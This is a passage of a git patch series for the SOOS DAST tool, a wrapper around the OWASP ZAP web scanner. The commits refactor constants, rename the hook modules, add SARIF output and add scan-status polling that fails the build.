+    this.addOption(args, CONSTANTS.ZAP.DEBUG_OPTION, this.config.debug);
+    this.addOption(args, CONSTANTS.ZAP.AJAX_SPIDER_OPTION, this.config.ajaxSpider);
+    this.addOption(args, CONSTANTS.ZAP.SPIDER_MINUTES_OPTION, this.config.fullScanMinutes);
+    this.addOption(
+      args,
+      CONSTANTS.ZAP.JSON_REPORT_OPTION,
+      CONSTANTS.FILES.REPORT_SCAN_RESULT_FILENAME
+    );
+    this.addOption(args, CONSTANTS.ZAP.OPTIONS, this.config.otherOptions);
+    this.addOption(args, CONSTANTS.ZAP.HOOK_OPTION, CONSTANTS.FILES.ZAP_CUSTOM_HOOK_SCRIPT);
     this.addHookParams();
 
     return args.join(" ");
   }
 
   private baselineScan(): string {
-    const args = [PY_CMD, BASE_LINE_SCRIPT];
+    const args = [CONSTANTS.ZAP.COMMAND, CONSTANTS.ZAP.SCRIPTS.BASE_LINE];
     return this.generateCommand(args);
   }
 
   private fullScan(): string {
-    const args = [PY_CMD, FULL_SCAN_SCRIPT];
-    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
+    const args = [CONSTANTS.ZAP.COMMAND, CONSTANTS.ZAP.SCRIPTS.FULL_SCAN];
+    this.addOption(args, CONSTANTS.ZAP.TARGET_URL_OPTION, this.config.targetURL);
     return this.generateCommand(args);
   }
 
   private apiScan(): string {
-    const args = [PY_CMD, API_SCAN_SCRIPT];
-    this.addOption(args, ZAP_TARGET_URL_OPTION, this.config.targetURL);
-    this.addOption(args, ZAP_FORMAT_OPTION, this.config.apiScanFormat);
+    const args = [CONSTANTS.ZAP.COMMAND, CONSTANTS.ZAP.SCRIPTS.API_SCAN];
+    this.addOption(args, CONSTANTS.ZAP.TARGET_URL_OPTION, this.config.targetURL);
+    this.addOption(args, CONSTANTS.ZAP.FORMAT_OPTION, this.config.apiScanFormat);
     return this.generateCommand(args);
   }
 
diff --git a/src/utils/constants.ts b/src/utils/constants.ts
index 58e75a9..79950ed 100644
--- a/src/utils/constants.ts
+++ b/src/utils/constants.ts
@@ -1,29 +1,41 @@
-export const SOOS_API_KEY_ENV_VAR = "SOOS_API_KEY";
-export const SOOS_CLIENT_ID_ENV_VAR = "SOOS_CLIENT_ID";
-export const AUTH_DELAY_TIME = 5;
-export const SARIF_FILE = "results.sarif";
-
-// ZAP related constants
-export const PY_CMD = "python3";
-export const BASE_LINE_SCRIPT = "/zap/zap-baseline.py";
-export const FULL_SCAN_SCRIPT = "/zap/zap-full-scan.py";
-export const API_SCAN_SCRIPT = "/zap/zap-api-scan.py";
-export const CONFIG_FILE_FOLDER = "/zap/config/";
-export const ZAP_TARGET_URL_OPTION = "-t";
-export const ZAP_RULES_FILE_OPTION = "-c";
-export const ZAP_CONTEXT_FILE_OPTION = "-n";
-export const ZAP_SPIDER_MINUTES_OPTION = "-m";
-export const ZAP_DEBUG_OPTION = "-d";
-export const ZAP_AJAX_SPIDER_OPTION = "-j";
-export const ZAP_FORMAT_OPTION = "-f";
-export const ZAP_JSON_REPORT_OPTION = "-J";
-export const ZAP_OPTIONS = "-z";
-export const ZAP_HOOK_OPTION = "--hook";
-export const ZAP_ACTIVE_SCAN_POLICY_NAME = "Default Policy";
-export const ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH = "/home/zap/.ZAP/scripts/scripts/httpsender/";
-export const REPORT_SCAN_RESULT_FILENAME = "report.json";
-export const REPORT_SCAN_RESULT_FILE = `/zap/wrk/${REPORT_SCAN_RESULT_FILENAME}`;
-export const ZAP_CUSTOM_HOOK_SCRIPT = "src/hooks/soos_zap_hook.py";
-export const SPIDERED_URLS_FILE_PATH = "./spidered_urls.txt";
-export const DAST_TOOL = "zap";
-export const DAST_TOOL_VERSION = "2.12";
+export const CONSTANTS = {
+  SOOS: {
+    API_KEY_ENV_VAR: "SOOS_API_KEY",
+    CLIENT_ID_ENV_VAR: "SOOS_CLIENT_ID",
+  },
+  AUTH: {
+    DELAY_TIME: 5,
+  },
+  FILES: {
+    SARIF: "results.sarif",
+    REPORT_SCAN_RESULT_FILENAME: "report.json",
+    REPORT_SCAN_RESULT_FILE: "/zap/wrk/report.json",
+    SPIDERED_URLS_FILE_PATH: "./spidered_urls.txt",
+    ZAP_CUSTOM_HOOK_SCRIPT: "src/hooks/soos_zap_hook.py",
+  },
+  ZAP: {
+    COMMAND: "python3",
+    SCRIPTS: {
+      BASE_LINE: "/zap/zap-baseline.py",
+      FULL_SCAN: "/zap/zap-full-scan.py",
+      API_SCAN: "/zap/zap-api-scan.py",
+    },
+    CONFIG_FILE_FOLDER: "/zap/config/",
+    TARGET_URL_OPTION: "-t",
+    RULES_FILE_OPTION: "-c",
+    CONTEXT_FILE_OPTION: "-n",
+    SPIDER_MINUTES_OPTION: "-m",
+    DEBUG_OPTION: "-d",
+    AJAX_SPIDER_OPTION: "-j",
+    FORMAT_OPTION: "-f",
+    JSON_REPORT_OPTION: "-J",
+    OPTIONS: "-z",
+    HOOK_OPTION: "--hook",
+    ACTIVE_SCAN_POLICY_NAME: "Default Policy",
+    HTTP_SENDER_SCRIPTS_FOLDER_PATH: "/home/zap/.ZAP/scripts/scripts/httpsender/",
+  },
+  DAST: {
+    TOOL: "zap",
+    TOOL_VERSION: "2.12",
+  },
+};
diff --git a/src/utils/index.ts b/src/utils/index.ts
new file mode 100644
index 0000000..757ee81
--- /dev/null
+++ b/src/utils/index.ts
@@ -0,0 +1,3 @@
+export * from "./ZAPCommandGenerator";
+export * from "./enums";
+export * from "./constants";

From 3efc52cf7f1c367f5217913a06453c2722a179e5 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 09:48:34 -0300
Subject: [PATCH 05/26] rename of hook files

---
 Dockerfile                                         |  2 +-
 src/utils/constants.ts                             |  2 +-
 .../auth.py => zap_hooks/helpers/auth_context.py}  | 11 +++++------
 src/{hooks => zap_hooks}/helpers/blindxss.py       |  4 ++--
 src/{hooks => zap_hooks}/helpers/browserstorage.py |  0
 src/{hooks => zap_hooks}/helpers/configuration.py  |  6 +++---
 src/{hooks => zap_hooks}/helpers/constants.py      |  0
 src/{hooks => zap_hooks}/helpers/custom_cookies.py |  6 +++---
 src/{hooks => zap_hooks}/helpers/custom_headers.py |  4 ++--
 src/{hooks => zap_hooks}/helpers/globals.py        |  2 +-
 .../log.py => zap_hooks/helpers/logging.py}        |  2 +-
 src/{hooks => zap_hooks}/helpers/requestheaders.py |  0
 .../utils.py => zap_hooks/helpers/utilities.py}    |  6 +++---
 src/{hooks => zap_hooks}/model/log_level.py        |  2 +-
 .../model/target_availability_check.py             |  0
 src/{hooks => zap_hooks}/requirements.txt          |  0
 src/{hooks => zap_hooks}/soos_zap_hook.py          | 14 +++++++-------
 17 files changed, 30 insertions(+), 31 deletions(-)
 rename src/{hooks/helpers/auth.py => zap_hooks/helpers/auth_context.py} (98%)
 rename src/{hooks => zap_hooks}/helpers/blindxss.py (90%)
 rename src/{hooks => zap_hooks}/helpers/browserstorage.py (100%)
 rename src/{hooks => zap_hooks}/helpers/configuration.py (95%)
 rename src/{hooks => zap_hooks}/helpers/constants.py (100%)
 rename src/{hooks => zap_hooks}/helpers/custom_cookies.py (80%)
 rename src/{hooks => zap_hooks}/helpers/custom_headers.py (83%)
 rename src/{hooks => zap_hooks}/helpers/globals.py (55%)
 rename src/{hooks/helpers/log.py => zap_hooks/helpers/logging.py} (97%)
 rename src/{hooks => zap_hooks}/helpers/requestheaders.py (100%)
 rename src/{hooks/helpers/utils.py => zap_hooks/helpers/utilities.py} (90%)
 rename src/{hooks => zap_hooks}/model/log_level.py (88%)
 rename src/{hooks => zap_hooks}/model/target_availability_check.py (100%)
 rename src/{hooks => zap_hooks}/requirements.txt (100%)
 rename src/{hooks => zap_hooks}/soos_zap_hook.py (85%)

diff --git a/Dockerfile b/Dockerfile
index f54baa1..2b81245 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -16,7 +16,7 @@ COPY ./src/ ./src/
 COPY ./tsconfig.json ./
 COPY ./package.json ./
 
-RUN pip3 install -r ./src/hooks/requirements.txt
+RUN pip3 install -r ./src/zap_hooks/requirements.txt
 
 RUN mkdir /zap/wrk && cd /opt \
     && wget -qO- -O geckodriver.tar.gz https://github.com/mozilla/geckodriver/releases/download/v0.30.0/geckodriver-v0.30.0-linux64.tar.gz \
diff --git a/src/utils/constants.ts b/src/utils/constants.ts
index 79950ed..e252e39 100644
--- a/src/utils/constants.ts
+++ b/src/utils/constants.ts
@@ -11,7 +11,7 @@ export const CONSTANTS = {
     REPORT_SCAN_RESULT_FILENAME: "report.json",
     REPORT_SCAN_RESULT_FILE: "/zap/wrk/report.json",
     SPIDERED_URLS_FILE_PATH: "./spidered_urls.txt",
-    ZAP_CUSTOM_HOOK_SCRIPT: "src/hooks/soos_zap_hook.py",
+    ZAP_CUSTOM_HOOK_SCRIPT: "src/zap_hooks/soos_zap_hook.py",
   },
   ZAP: {
     COMMAND: "python3",
diff --git a/src/hooks/helpers/auth.py b/src/zap_hooks/helpers/auth_context.py
similarity index 98%
rename from src/hooks/helpers/auth.py
rename to src/zap_hooks/helpers/auth_context.py
index b8bb6f9..32eceb4 100644
--- a/src/hooks/helpers/auth.py
+++ b/src/zap_hooks/helpers/auth_context.py
@@ -16,12 +16,11 @@
 import zap_common
 import logging
 
-from src.hooks.helpers.browserstorage import BrowserStorage
-from src.hooks.helpers.utils import array_to_dict, log
-from src.hooks.model.log_level import LogLevel
-from src.hooks.helpers.log import LoggingFilter
-from src.hooks.helpers import constants as Constants
-import src.hooks.helpers.globals as globals
+from src.zap_hooks.helpers.browserstorage import BrowserStorage
+from src.zap_hooks.helpers.utilities import array_to_dict, log
+from src.zap_hooks.model.log_level import LogLevel
+from src.zap_hooks.helpers.logging import LoggingFilter
+import src.zap_hooks.helpers.globals as globals
 
 
 def setup_context(zap, target, config):
diff --git a/src/hooks/helpers/blindxss.py b/src/zap_hooks/helpers/blindxss.py
similarity index 90%
rename from src/hooks/helpers/blindxss.py
rename to src/zap_hooks/helpers/blindxss.py
index b4ca0bf..92d2db8 100644
--- a/src/hooks/helpers/blindxss.py
+++ b/src/zap_hooks/helpers/blindxss.py
@@ -2,8 +2,8 @@
 from sys import exit
 from traceback import print_exc
 
-from src.hooks.helpers.configuration import DASTConfig
-from src.hooks.helpers.utils import log, read_file
+from src.zap_hooks.helpers.configuration import DASTConfig
+from src.zap_hooks.helpers.utilities import log, read_file
 
 
 def load(config: DASTConfig, zap):
diff --git a/src/hooks/helpers/browserstorage.py b/src/zap_hooks/helpers/browserstorage.py
similarity index 100%
rename from src/hooks/helpers/browserstorage.py
rename to src/zap_hooks/helpers/browserstorage.py
diff --git a/src/hooks/helpers/configuration.py b/src/zap_hooks/helpers/configuration.py
similarity index 95%
rename from src/hooks/helpers/configuration.py
rename to src/zap_hooks/helpers/configuration.py
index d62f86c..19085da 100644
--- a/src/hooks/helpers/configuration.py
+++ b/src/zap_hooks/helpers/configuration.py
@@ -3,9 +3,9 @@
 import traceback
 from typing import Optional, List
 
-from src.hooks.helpers.constants import EMPTY_STRING
-from src.hooks.helpers.utils import log
-from src.hooks.model.log_level import LogLevel
+from src.zap_hooks.helpers.constants import EMPTY_STRING
+from src.zap_hooks.helpers.utilities import log
+from src.zap_hooks.model.log_level import LogLevel
 
 
 
diff --git a/src/hooks/helpers/constants.py b/src/zap_hooks/helpers/constants.py
similarity index 100%
rename from src/hooks/helpers/constants.py
rename to src/zap_hooks/helpers/constants.py
diff --git a/src/hooks/helpers/custom_cookies.py b/src/zap_hooks/helpers/custom_cookies.py
similarity index 80%
rename from src/hooks/helpers/custom_cookies.py
rename to src/zap_hooks/helpers/custom_cookies.py
index e257d45..daa9043 100644
--- a/src/hooks/helpers/custom_cookies.py
+++ b/src/zap_hooks/helpers/custom_cookies.py
@@ -2,9 +2,9 @@
 import traceback
 import json
 
-from src.hooks.helpers.configuration import DASTConfig
-from src.hooks.helpers.constants import ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH
-from src.hooks.helpers.utils import log, process_custom_cookie_header_data
+from src.zap_hooks.helpers.configuration import DASTConfig
+from src.zap_hooks.helpers.constants import ZAP_HTTP_SENDER_SCRIPTS_FOLDER_PATH
+from src.zap_hooks.helpers.utilities import log, process_custom_cookie_header_data
 
 
 def load(config: DASTConfig, zap):
diff --git a/src/hooks/helpers/custom_headers.py b/src/zap_hooks/helpers/custom_headers.py
similarity index 83%
rename from src/hooks/helpers/custom_headers.py
rename to src/zap_hooks/helpers/custom_headers.py
index 0ff1bca..78db5a7 100644
--- a/src/hooks/helpers/custom_headers.py
+++ b/src/zap_hooks/helpers/custom_headers.py
@@ -1,8 +1,8 @@
 import sys
 import traceback
 
-from src.hooks.helpers.configuration import DASTConfig
-from src.hooks.helpers.utils import log, process_custom_cookie_header_data
+from src.zap_hooks.helpers.configuration import DASTConfig
+from src.zap_hooks.helpers.utilities import log, process_custom_cookie_header_data
 
 
 def load(config: DASTConfig, zap):
diff --git a/src/hooks/helpers/globals.py b/src/zap_hooks/helpers/globals.py
similarity index 55%
rename from src/hooks/helpers/globals.py
rename to src/zap_hooks/helpers/globals.py
index 00a4900..30e2dfa 100644
--- a/src/hooks/helpers/globals.py
+++ b/src/zap_hooks/helpers/globals.py
@@ -1,4 +1,4 @@
-from src.hooks.helpers.constants import ZAP_AUTH_CONTEXT
+from src.zap_hooks.helpers.constants import ZAP_AUTH_CONTEXT
 def initialize(): 
     global context_name
     global context_id
diff --git a/src/hooks/helpers/log.py b/src/zap_hooks/helpers/logging.py
similarity index 97%
rename from src/hooks/helpers/log.py
rename to src/zap_hooks/helpers/logging.py
index dad1151..d1080e2 100644
--- a/src/hooks/helpers/log.py
+++ b/src/zap_hooks/helpers/logging.py
@@ -7,7 +7,7 @@
 from termcolor import colored
 from datetime import datetime
 
-from src.hooks.helpers import constants as Constants
+from src.zap_hooks.helpers import constants as Constants
 
 
 class ColorStreamHandler(logging.StreamHandler):
diff --git a/src/hooks/helpers/requestheaders.py b/src/zap_hooks/helpers/requestheaders.py
similarity index 100%
rename from src/hooks/helpers/requestheaders.py
rename to src/zap_hooks/helpers/requestheaders.py
diff --git a/src/hooks/helpers/utils.py b/src/zap_hooks/helpers/utilities.py
similarity index 90%
rename from src/hooks/helpers/utils.py
rename to src/zap_hooks/helpers/utilities.py
index 34578a9..34f1183 100644
--- a/src/hooks/helpers/utils.py
+++ b/src/zap_hooks/helpers/utilities.py
@@ -4,9 +4,9 @@
 from requests import Response
 from requests.exceptions import HTTPError
 
-import src.hooks.helpers.constants as Constants
-from src.hooks.model.log_level import LogLevel, loggerFunc
-from src.hooks.model.target_availability_check import TargetAvailabilityCheck
+import src.zap_hooks.helpers.constants as Constants
+from src.zap_hooks.model.log_level import LogLevel, loggerFunc
+from src.zap_hooks.model.target_availability_check import TargetAvailabilityCheck
 
 
 UTF_8: str = 'utf-8'
diff --git a/src/hooks/model/log_level.py b/src/zap_hooks/model/log_level.py
similarity index 88%
rename from src/hooks/model/log_level.py
rename to src/zap_hooks/model/log_level.py
index 892708c..90180d6 100644
--- a/src/hooks/model/log_level.py
+++ b/src/zap_hooks/model/log_level.py
@@ -1,7 +1,7 @@
 from enum import Enum
 from logging import DEBUG, INFO, WARN, ERROR, CRITICAL
 
-from src.hooks.helpers.log import console
+from src.zap_hooks.helpers.logging import console
 
 
 class LogLevel(Enum):
diff --git a/src/hooks/model/target_availability_check.py b/src/zap_hooks/model/target_availability_check.py
similarity index 100%
rename from src/hooks/model/target_availability_check.py
rename to src/zap_hooks/model/target_availability_check.py
diff --git a/src/hooks/requirements.txt b/src/zap_hooks/requirements.txt
similarity index 100%
rename from src/hooks/requirements.txt
rename to src/zap_hooks/requirements.txt
diff --git a/src/hooks/soos_zap_hook.py b/src/zap_hooks/soos_zap_hook.py
similarity index 85%
rename from src/hooks/soos_zap_hook.py
rename to src/zap_hooks/soos_zap_hook.py
index 979d356..f3faf16 100644
--- a/src/hooks/soos_zap_hook.py
+++ b/src/zap_hooks/soos_zap_hook.py
@@ -2,13 +2,13 @@
 import traceback
 from typing import List
 
-from src.hooks.helpers.auth import authenticate
-from src.hooks.helpers.configuration import DASTConfig
-from src.hooks.helpers.utils import log, exit_app
-from src.hooks.helpers import custom_cookies as cookies
-from src.hooks.helpers import custom_headers as headers
-from src.hooks.helpers import constants as Constants
-import src.hooks.helpers.globals as globals
+from src.zap_hooks.helpers.auth_context import authenticate
+from src.zap_hooks.helpers.configuration import DASTConfig
+from src.zap_hooks.helpers.utilities import log, exit_app
+from src.zap_hooks.helpers import custom_cookies as cookies
+from src.zap_hooks.helpers import custom_headers as headers
+from src.zap_hooks.helpers import constants as Constants
+import src.zap_hooks.helpers.globals as globals
 
 config = DASTConfig()
 

From d9e7dd1081db948d6cbd0f163b62ff6c9ef978a8 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 10:31:26 -0300
Subject: [PATCH 06/26] finish sarif, update scan only when it's not done

---
 src/index.ts | 33 +++++++++++++++++++++++++++++----
 1 file changed, 29 insertions(+), 4 deletions(-)

diff --git a/src/index.ts b/src/index.ts
index e6e4c4e..ec0857d 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -10,7 +10,14 @@ import {
   isUrlAvailable,
   convertStringToB64,
 } from "@soos-io/api-client/dist/utilities";
-import { ScanStatus, ScanType, soosLogger, LogLevel, OutputFormat } from "@soos-io/api-client";
+import {
+  ScanStatus,
+  ScanType,
+  soosLogger,
+  LogLevel,
+  OutputFormat,
+  SOOS_CONSTANTS,
+} from "@soos-io/api-client";
 import { ZAPCommandGenerator, CONSTANTS } from "./utils";
 
 export interface SOOSDASTAnalysisArgs {
@@ -378,6 +385,7 @@ class SOOSDASTAnalysis {
   }
 
   async runAnalysis(): Promise<void> {
+    let scanDone: boolean = false;
     let projectHash: string | undefined;
     let branchHash: string | undefined;
     let analysisId: string | undefined;
@@ -449,7 +457,12 @@ class SOOSDASTAnalysis {
         "file",
         convertStringToB64(
           JSON.stringify(
-            JSON.parse(fs.readFileSync(CONSTANTS.FILES.REPORT_SCAN_RESULT_FILE, "utf-8"))
+            JSON.parse(
+              fs.readFileSync(
+                CONSTANTS.FILES.REPORT_SCAN_RESULT_FILE,
+                SOOS_CONSTANTS.FileUploads.Encoding
+              )
+            )
           )
         ),
         "base64Manifest"
@@ -464,6 +477,8 @@ class SOOSDASTAnalysis {
         resultFile: formData,
       });
 
+      scanDone = true;
+
       if (this.args.outputFormat !== undefined) {
         soosLogger.info(`Generating SARIF report  ${this.args.projectName}...`);
         const output = await soosApiClient.getFormattedScanResult({
@@ -477,10 +492,20 @@ class SOOSDASTAnalysis {
         if (output) {
           soosLogger.info(`Output ('${this.args.outputFormat}' format):`);
           soosLogger.info(JSON.stringify(output, null, 2));
+          if (this.args.checkoutDir) {
+            soosLogger.info(
+              `Writing SARIF report to ${this.args.checkoutDir}/${CONSTANTS.FILES.SARIF}`
+            );
+            fs.writeFileSync(
+              `${this.args.checkoutDir}/${CONSTANTS.FILES.SARIF}`,
+              JSON.stringify(output, null, 2)
+            );
+          }
         }
       }
     } catch (error) {
-      if (projectHash && branchHash && analysisId)
+      soosLogger.error(error);
+      if (projectHash && branchHash && analysisId && !scanDone)
         await soosApiClient.updateScanStatus({
           clientId: this.args.clientId,
           projectHash,
@@ -490,7 +515,7 @@ class SOOSDASTAnalysis {
           status: ScanStatus.Error,
           message: `Error while performing scan.`,
         });
-      soosLogger.error(error);
+      soosLogger.error("There was an error while performing the scan. Exiting script.");
       exit(1);
     }
   }

From d56b85878d3574d127ba8f9017fc123e0ae21058 Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 11:05:42 -0300
Subject: [PATCH 07/26] Added onfailure behaviour

---
 src/index.ts           | 52 ++++++++++++++++++++++++++++++++++++++++++
 src/utils/constants.ts |  4 ++++
 2 files changed, 56 insertions(+)

diff --git a/src/index.ts b/src/index.ts
index ec0857d..cdd1c3e 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -9,6 +9,7 @@ import {
   getEnvVariable,
   isUrlAvailable,
   convertStringToB64,
+  sleep,
 } from "@soos-io/api-client/dist/utilities";
 import {
   ScanStatus,
@@ -503,6 +504,14 @@ class SOOSDASTAnalysis {
           }
         }
       }
+
+      if (this.args.onFailure === OnFailure.Fail) {
+        await this.waitForScanToFinish({
+          apiClient: soosApiClient,
+          scanStatusUrl: result.scanStatusUrl,
+          attempt: 0,
+        });
+      }
     } catch (error) {
       soosLogger.error(error);
       if (projectHash && branchHash && analysisId && !scanDone)
@@ -520,6 +529,49 @@ class SOOSDASTAnalysis {
     }
   }
 
+  async waitForScanToFinish({
+    apiClient,
+    scanStatusUrl,
+    attempt,
+  }: {
+    apiClient: SOOSAnalysisApiClient;
+    scanStatusUrl: string;
+    attempt: number;
+  }): Promise<void> {
+    const status = await apiClient.getScanStatus({ scanStatusUrl });
+
+    if (!status.isComplete) {
+      soosLogger.info(`Scan status: ${status.status}...`);
+      if (attempt >= CONSTANTS.STATUS.MAX_ATTEMPTS) {
+        soosLogger.error("Max attempts reached. for fetching scan status.");
+        soosLogger.error("Failing the build.");
+        process.exit(1);
+      }
+      await sleep(CONSTANTS.STATUS.DELAY_TIME);
+      return this.waitForScanToFinish({ apiClient, scanStatusUrl, attempt: attempt++ });
+    }
+
+    if (status.status === ScanStatus.FailedWithIssues) {
+      soosLogger.info("Analysis complete - Failures reported");
+      soosLogger.info("Failing the build.");
+      process.exit(1);
+    } else if (status.status === ScanStatus.Incomplete) {
+      soosLogger.info(
+        "Analysis Incomplete. It may have been cancelled or superseded by another scan."
+      );
+      soosLogger.info("Failing the build.");
+      process.exit(1);
+    } else if (status.status === ScanStatus.Error) {
+      soosLogger.info("Analysis Error.");
+      soosLogger.info("Failing the build.");
+      process.exit(1);
+    } else if (scanStatusUrl === "finished") {
+      return;
+    } else {
+      process.exit(0);
+    }
+  }
+
   static async runZap(command: string): Promise<void> {
     return new Promise((resolve, reject) => {
       console.log("Running ZAP");
diff --git a/src/utils/constants.ts b/src/utils/constants.ts
index e252e39..0a8b811 100644
--- a/src/utils/constants.ts
+++ b/src/utils/constants.ts
@@ -6,6 +6,10 @@ export const CONSTANTS = {
   AUTH: {
     DELAY_TIME: 5,
   },
+  STATUS: {
+    DELAY_TIME: 5,
+    MAX_ATTEMPTS: 10,
+  },
   FILES: {
     SARIF: "results.sarif",
     REPORT_SCAN_RESULT_FILENAME: "report.json",

From 38c679629ff7b58dd9430b5a3fb092061f9c010f Mon Sep 17 00:00:00 2001
From: SOOS-JAlvarez <jalvarez@soos.io>
Date: Mon, 6 Nov 2023 12:08:18 -0300
Subject: [PATCH 08/26] code review

---
 package-lock.json                |   8 +-
 package.json                     |   2 +-
 src/index.ts                     | 333 +++++++++++++++----------------
 src/utils/ZAPCommandGenerator.ts |  32 +--
 4 files changed, 178 insertions(+), 197 deletions(-)

diff --git a/package-lock.json b/package-lock.json
index d4fe25c..7b89dad 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -9,7 +9,7 @@
       "version": "2.0.0",
       "license": "MIT",
       "dependencies": {
-        "@soos-io/api-client": "0.1.5-pre.6",
+        "@soos-io/api-client": "0.1.5-pre.7",
         "argparse": "^2.0.1",
         "axios": "^0.27.2",
         "tslib": "^2.6.2",
@@ -24,9 +24,9 @@
       }
     },
     "node_modules/@soos-io/api-client": {
-      "version": "0.1.5-pre.6",
-      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.6.tgz",
-      "integrity": "sha512-CxAsP0wIo8gqjTAF+dzIXRT7vvCfNwAl04MsY2orzXAvVfldSOftWEgB1S+7ssAsqwx7C0wQhb5W3r63VCiCLg==",
+      "version": "0.1.5-pre.7",
+      "resolved": "https://registry.npmjs.org/@soos-io/api-client/-/api-client-0.1.5-pre.7.tgz",
+      "integrity": "sha512-RtCLYg+XYXheuZqqRNdxw5XuSKkn1RK5CrPr7Xe7TSiZ3sW1I770vUnV8NQgfku5AdQYwRqmKX39WkIQQC6akQ==",
       "dependencies": {
         "axios": "^0.27.2",
         "tslib": "^2.6.2"
diff --git a/package.json b/package.json
index eac629a..3871416 100644
--- a/package.json
+++ b/package.json
@@ -17,7 +17,7 @@
     "check": "npm run format && npm run typecheck && npm run test"
   },
   "dependencies": {
-    "@soos-io/api-client": "0.1.5-pre.6",
+    "@soos-io/api-client": "0.1.5-pre.7",
     "argparse": "^2.0.1",
     "axios": "^0.27.2",
     "tslib": "^2.6.2",
diff --git a/src/index.ts b/src/index.ts
index cdd1c3e..34c2e7c 100644
--- a/src/index.ts
+++ b/src/index.ts
@@ -8,7 +8,7 @@ import SOOSAnalysisApiClient from "@soos-io/api-client/dist/api/SOOSAnalysisApiC
 import {
   getEnvVariable,
   isUrlAvailable,
-  convertStringToB64,
+  convertStringToBase64,
   sleep,
 } from "@soos-io/api-client/dist/utilities";
 import {
@@ -22,66 +22,63 @@ import {
 import { ZAPCommandGenerator, CONSTANTS } from "./utils";
 
 export interface SOOSDASTAnalysisArgs {
+  ajaxSpider: boolean;
   apiKey: string;
+  apiScanFormat: ApiScanFormat;
   apiURL: string;
   appVersion: string;
+  authDelayTime: number;
+  authFormType: FormTypes;
+  authLoginURL: string;
+  authPassword: string;
+  authPasswordField: string;
+  authSecondSubmitField: string;
+  authSubmitAction: SubmitActions;
+  authSubmitField: string;
+  authUsername: string;
+  authUsernameField: string;
+  authVerificationURL: string;
+  bearerToken: string;
   branchName: string;
-  branchUri: string;
-  buildUri: string;
+  branchURI: string;
+  buildURI: string;
   buildVersion: string;
+  checkoutDir: string;
   clientId: string;
   commitHash: string;
+  contextFile: string;
+  debug: boolean;
+  disableRules: string;
+  fullScanMinutes: number;
   integrationName: string;
   integrationType: string;
   logLevel: LogLevel;
+  oauthParameters: string;
+  oauthTokenUrl: string;
   onFailure: OnFailure;
   operatingEnvironment: string;
+  otherOptions: string;
+  outputFormat: OutputFormat;
   projectName: string;
-  scriptVersion: string;
-  targetURL: string;
-  scanMode: ScanMode;
-  debug: boolean;
-  ajaxSpider: boolean;
-  contextFile: string;
-  fullScanMinutes: number;
-  apiScanFormat: ApiScanFormat;
-  authUsername: string;
-  authPassword: string;
-  authLoginURL: string;
-  authUsernameField: string;
-  authPasswordField: string;
-  authSubmitField: string;
-  authSecondSubmitField: string;
-  authSubmitAction: SubmitActions;
-  authFormType: FormTypes;
-  authDelayTime: number;
-  authVerificationURL: string;
+  reportRequestHeaders: boolean;
   requestCookies: string;
   requestHeaders: string;
-  reportRequestHeaders: boolean;
-  bearerToken: string;
-  oauthTokenUrl: string;
-  oauthParameters: string;
+  scanMode: ScanMode;
+  scriptVersion: string;
+  targetURL: string;
   updateAddons: boolean;
-  disableRules: string;
-  otherOptions: string;
   verbose: boolean;
-  outputFormat: OutputFormat;
-  checkoutDir: string;
 }
+
 class SOOSDASTAnalysis {
   constructor(private args: SOOSDASTAnalysisArgs) {}
 
   static parseArgs(): SOOSDASTAnalysisArgs {
     const parser = new ArgumentParser({ description: "SOOS DAST" });
 
-    parser.add_argument("targetURL", {
-      help: "Target URL - URL of the site or api to scan. The URL should include the protocol. Ex: https://www.example.com",
-    });
-
-    parser.add_argument("--clientId", {
-      help: "SOOS Client ID - get yours from https://app.soos.io/integrate/sca",
-      default: getEnvVariable(CONSTANTS.SOOS.CLIENT_ID_ENV_VAR),
+    parser.add_argument("--ajaxSpider", {
+      help: "Enable Ajax Spider.",
+      action: "store_true",
       required: false,
     });
 
@@ -91,77 +88,57 @@ class SOOSDASTAnalysis {
       required: false,
     });
 
-    parser.add_argument("--projectName", {
-      help: "Project Name - this is what will be displayed in the SOOS app.",
-      required: true,
-    });
-
-    parser.add_argument("--scanMode", {
-      help: "Scan Mode - Available modes: baseline, fullscan, and apiscan (for more information about scan modes visit https://github.com/soos-io/soos-dast#scan-modes)",
-      default: ScanMode.Baseline,
+    parser.add_argument("--apiScanFormat", {
+      help: "Target API format, OpenAPI, SOAP or GraphQL.",
       required: false,
       type: (value: string) => {
-        if (Object.values(ScanMode).includes(value as ScanMode)) {
-          return value as ScanMode;
+        if (Object.values(ApiScanFormat).includes(value as ApiScanFormat)) {
+          return value as ApiScanFormat;
         } else {
-          throw new Error(`Invalid scan mode: ${value}`);
+          throw new Error(`Invalid Api Scan Format: ${value}`);
         }
       },
     });
 
-    parser.add_argument("--debug", {
-      help: "Enable debug logging for zap.",
-      action: "store_true",
-      required: false,
-    });
-
-    parser.add_argument("--ajaxSpider", {
-      help: "Enable Ajax Spider.",
-      action: "store_true",
+    parser.add_argument("--apiURL", {
+      help: "SOOS API URL - Intended for internal use only, do not modify.",
+      default: "https://api.soos.io/api/",
       required: false,
     });
 
-    parser.add_argument("--contextFile", {
-      help: "Context file which will be loaded prior to scanning the target.",
-      nargs: "*",
+    parser.add_argument("--appVersion", {
+      help: "App Version - Intended for internal use only.",
       required: false,
     });
 
-    parser.add_argument("--fullScanMinutes", {
-      help: "Number of minutes for the spider to run.",
-      default: 120,
+    parser.add_argument("--authDelayTime", {
+      help: "Delay time in seconds to wait for the page to load after performing actions in the form. (Used only on authFormType: wait_for_password and multi_page)",
+      default: CONSTANTS.AUTH.DELAY_TIME,
       required: false,
     });
 
-    parser.add_argument("--apiScanFormat", {
-      help: "Target API format, OpenAPI, SOAP or GraphQL.",
+    parser.add_argument("--authFormType", {
+      help: `Form type of the login URL options are: simple (all fields are displayed at once),
+             wait_for_password (Password field is displayed only after username is filled),
+             or multi_page (Password field is displayed only after username is filled and submit is clicked).`,
